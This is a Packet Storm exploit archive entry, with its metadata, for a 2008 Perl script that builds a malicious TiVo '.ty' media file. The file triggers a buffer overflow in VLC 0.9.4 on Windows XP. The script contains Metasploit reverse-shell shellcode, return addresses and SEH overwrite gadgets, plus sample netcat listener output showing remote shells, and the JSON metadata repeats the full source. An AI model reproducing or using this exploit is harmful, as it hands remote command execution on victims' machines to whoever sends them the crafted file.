ID PACKETSTORM:71227
Type packetstorm
Reporter k'sOSe
Modified 2008-10-27T00:00:00
Description
`#!/usr/bin/perl
# 10/23/2008 k`sOSe
# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit
# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k)
# 2 - Works both with a local file and with a remote url
# 3 - VLC do not crash!
# 4 - Enjoy a respawing shell, even if VLC will be closed!
#
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>
use warnings;
use strict;
# windows/exec - 141 bytes
# http://www.metasploit.com
my $shellcode =
# windows/shell_reverse_tcp - 287 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=443, LHOST=127.0.0.1
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24" .
"\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f" .
"\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84" .
"\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" .
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c" .
"\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" .
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e" .
"\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" .
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50" .
"\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff" .
"\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43" .
"\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66\x68\x01\xbb" .
"\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a" .
"\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50" .
"\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" .
"\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" .
"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51" .
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" .
"\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6" .
"\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a" .
"\x04\x5f\x53\xff\xd6\xff\xd0";
my $junk = "\x41";
open(my $file, "> evil.mpg");
print $file "\xF5\x46\x7A\xBD" . # TIVO_PES_FILEID
"\x00\x00\x00\x02" .
"\x00\x02\x00\x00" . # CHUNK_SIZE
$junk x 8 .
"\x00\x00\x05\x41" . # i_map_size
$junk x 4 .
"\x00\x00\x05\x49" . # SEQ table size / (i_map_size + 8) == 1
$junk x 60 .
"\xb3\x57\x04\x7d" . # jmp esp for winxp sp2.. if it fails SEH will be triggered
$shellcode .
$shellcode .
$junk x (733 - length($shellcode)) .
"\xeb\x06\x90\x90" . # jump ahead
"\x13\x12\x54\x6a" . # pop,pop,ret @ libvlc 0.9.4
"\xe9\x16\xfd\xff\xff". # jump back
$junk x 129943 .
"\x05" . # i_num_recs
$junk x 3 .
"\x05" . # p_hdrs
$junk x 1 .
"\x09" . # subrec_type \
# (subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo)
"\xc0" . # rec_type /
$junk x 14 .
"\x06" . # subrec_type \
# (subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo
"\xe0" . # rec_type /
$junk x 531062;
`
{"type": "packetstorm", "published": "2008-10-27T00:00:00", "reporter": "k'sOSe", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "3933abd9ed464511865e1d8392482df2"}, {"key": "modified", "hash": "1e55f1538a4cf913e03e2f1e92422003"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "1e55f1538a4cf913e03e2f1e92422003"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "1f189527d7b2f547daaf4b51eb47d258"}, {"key": "sourceData", "hash": "e28bf27ecddd61df3cd6d2df78e7a79e"}, {"key": "sourceHref", "hash": "f006b70af40313fb4efd71a0e4056ac7"}, {"key": "title", "hash": "39ca8b24fa90ef7e7922039d30bbe11a"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`#!/usr/bin/perl \n# 10/23/2008 k`sOSe \n# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit \n# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k) \n# 2 - Works both with a local file and with a remote url \n# 3 - VLC do not crash! \n# 4 - Enjoy a respawing shell, even if VLC will be closed! \n# \n# bUGGEd htdocs # nc -l -p 443 \n# Microsoft Windows XP [Version 5.1.2600] \n# (C) Copyright 1985-2001 Microsoft Corp. \n# \n# e:\\Program Files\\VideoLAN\\VLC>exit \n# exit \n# bUGGEd htdocs # nc -l -p 443 \n# Microsoft Windows XP [Version 5.1.2600] \n# (C) Copyright 1985-2001 Microsoft Corp. \n# \n# e:\\Program Files\\VideoLAN\\VLC>exit \n# exit \n# bUGGEd htdocs # nc -l -p 443 \n# Microsoft Windows XP [Version 5.1.2600] \n# (C) Copyright 1985-2001 Microsoft Corp. \n# \n# e:\\Program Files\\VideoLAN\\VLC> \n \nuse warnings; \nuse strict; \n \n# windows/exec - 141 bytes \n# http://www.metasploit.com \nmy $shellcode = \n# windows/shell_reverse_tcp - 287 bytes \n# http://www.metasploit.com \n# EXITFUNC=seh, LPORT=443, LHOST=127.0.0.1 \n\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\" . \n\"\\x8b\\x45\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\" . \n\"\\x20\\x01\\xeb\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\" . \n\"\\xc0\\x74\\x07\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\" . \n\"\\x75\\xe5\\x8b\\x5f\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\" . \n\"\\x01\\xeb\\x03\\x2c\\x8b\\x89\\x6c\\x24\\x1c\\x61\\xc3\\x31\\xdb\\x64\" . \n\"\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40\\x08\\x5e\" . \n\"\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\" . \n\"\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\\x68\\xcb\\xed\\xfc\\x3b\\x50\" . \n\"\\xff\\xd6\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\\x02\\x55\\x6a\\x02\\xff\" . \n\"\\xd0\\x68\\xd9\\x09\\xf5\\xad\\x57\\xff\\xd6\\x53\\x53\\x53\\x53\\x43\" . \n\"\\x53\\x43\\x53\\xff\\xd0\\x68\\x7f\\x00\\x00\\x01\\x66\\x68\\x01\\xbb\" . \n\"\\x66\\x53\\x89\\xe1\\x95\\x68\\xec\\xf9\\xaa\\x60\\x57\\xff\\xd6\\x6a\" . \n\"\\x10\\x51\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66\\x68\\x63\\x6d\\x6a\\x50\" . \n\"\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\\xe2\\x31\\xc0\\xf3\\xaa\\x95\" . \n\"\\x89\\xfd\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x8d\\x7a\\x38\\xab\\xab\\xab\" . \n\"\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x28\\xff\\xd6\\x5b\\x57\\x52\\x51\" . \n\"\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\\x05\" . \n\"\\xce\\x53\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x68\\xe7\\x79\\xc6\" . \n\"\\x79\\xff\\x75\\x04\\xff\\xd6\\xff\\x77\\xfc\\xff\\xd0\\x68\\xf0\\x8a\" . \n\"\\x04\\x5f\\x53\\xff\\xd6\\xff\\xd0\"; \n \nmy $junk = \"\\x41\"; \n \nopen(my $file, \"> evil.mpg\"); \nprint $file \"\\xF5\\x46\\x7A\\xBD\" . # TIVO_PES_FILEID \n\"\\x00\\x00\\x00\\x02\" . \n\"\\x00\\x02\\x00\\x00\" . # CHUNK_SIZE \n$junk x 8 . \n\"\\x00\\x00\\x05\\x41\" . # i_map_size \n$junk x 4 . \n\"\\x00\\x00\\x05\\x49\" . # SEQ table size / (i_map_size + 8) == 1 \n$junk x 60 . \n\"\\xb3\\x57\\x04\\x7d\" . # jmp esp for winxp sp2.. if it fails SEH will be triggered \n$shellcode . \n$shellcode . \n$junk x (733 - length($shellcode)) . \n\"\\xeb\\x06\\x90\\x90\" . # jump ahead \n\"\\x13\\x12\\x54\\x6a\" . # pop,pop,ret @ libvlc 0.9.4 \n\"\\xe9\\x16\\xfd\\xff\\xff\". # jump back \n$junk x 129943 . \n\"\\x05\" . # i_num_recs \n$junk x 3 . \n\"\\x05\" . # p_hdrs \n$junk x 1 . \n\"\\x09\" . # subrec_type \\ \n# (subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo) \n\"\\xc0\" . # rec_type / \n$junk x 14 . \n\"\\x06\" . # subrec_type \\ \n# (subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo \n\"\\xe0\" . # rec_type / \n$junk x 531062; \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:17:55", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/71227/vlc094-overflow.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/71227/vlc094-overflow.txt", "title": "vlc094-overflow.txt", "enchantments": {"score": {"vector": "NONE", "value": 7.2}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:55"}, "vulnersScore": 7.2}, "references": [], "id": "PACKETSTORM:71227", "hash": "d0b97923ea3582c1873ba010febd03554192fb7cfaad43e414c81219ab0ece7f", "edition": 1, "cvelist": [], "modified": "2008-10-27T00:00:00", "description": ""}
{}
